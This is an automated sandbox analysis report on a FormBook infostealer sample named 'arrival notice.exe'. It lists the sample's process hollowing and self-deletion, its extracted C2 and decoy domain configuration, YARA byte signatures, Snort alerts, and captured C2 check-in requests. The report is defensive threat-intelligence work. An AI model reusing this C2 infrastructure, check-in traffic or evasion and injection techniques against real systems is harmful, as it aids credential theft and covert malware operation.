Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report arrival notice.exe

Overview

General Information

Sample Name:arrival notice.exe
Analysis ID:483574
MD5:692c22c9579ce47100a87e90f911b202
SHA1:29189325967d4716883edabb4c03a5a30d836896
SHA256:3f383c683795d277510e0fb4c806ae17bfb33dd6ff875b66c159068e58c28818
Tags:exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • arrival notice.exe (PID: 6224 cmdline: 'C:\Users\user\Desktop\arrival notice.exe' MD5: 692C22C9579CE47100A87E90F911B202)
    • arrival notice.exe (PID: 6400 cmdline: C:\Users\user\Desktop\arrival notice.exe MD5: 692C22C9579CE47100A87E90F911B202)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 6788 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\arrival notice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x80ba8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x80f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa89c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8cc55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xb4a75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x8c741:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xb4561:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x8cd57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xb4b77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x8cecf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xb4cef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x8195a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xa977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x8b9bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb37dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x826d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xaa4f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x92147:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xb9f67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x931ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 21 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.arrival notice.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.arrival notice.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.arrival notice.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.arrival notice.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.arrival notice.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nordicbatterybelt.net/n58i/"], "decoy": ["southerncircumstance.com", "mcsasco.com", "ifbrick.com", "societe-anonyme.net", "bantank.xyz", "dogecoin.beauty", "aboutacoffee.com", "babalandlordrealestate.com", "tintgta.com", "integrity.directory", "parwnr.icu", "poltishof.online", "stayandstyle.com", "ickjeame.xyz", "currentmotors.ca", "pond.fund", "petrosterzis.com", "deadbydaylightpoints.com", "hotel-balzac.paris", "focusmaintainance.com", "odeonmarket.com", "voeran.net", "lookailpop.xyz", "sashaignatenko.com", "royalgreenvillage.com", "airbhouse.com", "zl-dz.com", "fuwuxz.com", "wugupihuhepop.xyz", "zmdhysm.com", "luchin.site", "rnchaincvkbip.xyz", "fffddfrfqffrtgthhhbhffgfr.com", "goabbasoon.info", "booyahbucks.com", "ilovecoventry.com", "components-electronics.com", "advindustry.com", "browandline.com", "hotnspicy.site", "marlonj26.com", "holidays24.net", "starworks.online", "mbchaindogbbc.xyz", "3wouqg.com", "evnfreesx.com", "baureihe51.com", "hycelassetmanagement.space", "photostickomni-trendyfinds.com", "singisa4letterword.com", "thklw.online", "menramen.com", "highspeedinternetinc.com", "beerenhunger.info", "hisensor.world", "lassurancevalence.com", "clementchanlab.com", "customia.xyz", "alysvera-centroestetico.com", "cx-xiezuo.com", "index-mp3.com", "mybenefits51.com", "vyhozoi.site", "lingerista.net"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 3.2.arrival notice.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: arrival notice.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: arrival notice.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: colorcpl.pdbGCTL source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: arrival notice.exe, 00000003.00000002.452677257.0000000003460000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe, 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: arrival notice.exe, 00000003.00000002.451810551.000000000159F000.00000040.00000001.sdmp, colorcpl.exe
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 4x nop then pop edi3_2_0041625A
          Source: C:\Users\user\Desktop\arrival notice.exeCode function: 4x nop then pop edi3_2_0040C3D2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi10_2_0097625A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi10_2_0096C3D2

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49819 -> 217.160.0.150:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.beerenhunger.info
          Source: C:\Windows\explorer.exeDomain query: www.ilovecoventry.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mybenefits51.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.singisa4letterword.com
          Source: C:\Windows\explorer.exeDomain query: www.petrosterzis.com
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.150 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nordicbatterybelt.net/n58i/
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1Host: www.beerenhunger.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1Host: www.singisa4letterword.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Wed, 15 Sep 2021 07:24:30 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.403044652.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: arrival notice.exe, 00000001.00000002.380922873.0000000000DD7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.come.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: arrival notice.exe, 00000001.00000003.354453209.0000000000DDC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comm
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: arrival notice.exe, 00000001.00000002.387065887.0000000006692000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: colorcpl.exe, 0000000A.00000002.618757124.00000000051D2000.00000004.00020000.sdmpString found in binary or memory: https://www.aboutacoffee.com/n58i/?jrU4NBtp=iErxmr1uZwtSCCPIrNfUjuIgI02QQ4hyHDBIFJ5frhw4ANpZ5EdrzBW9
          Source: unknownDNS traffic detected: queries for: www.petrosterzis.com
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1Host: www.ilovecoventry.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1Host: www.beerenhunger.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1Host: www.singisa4letterword.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.arrival notice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
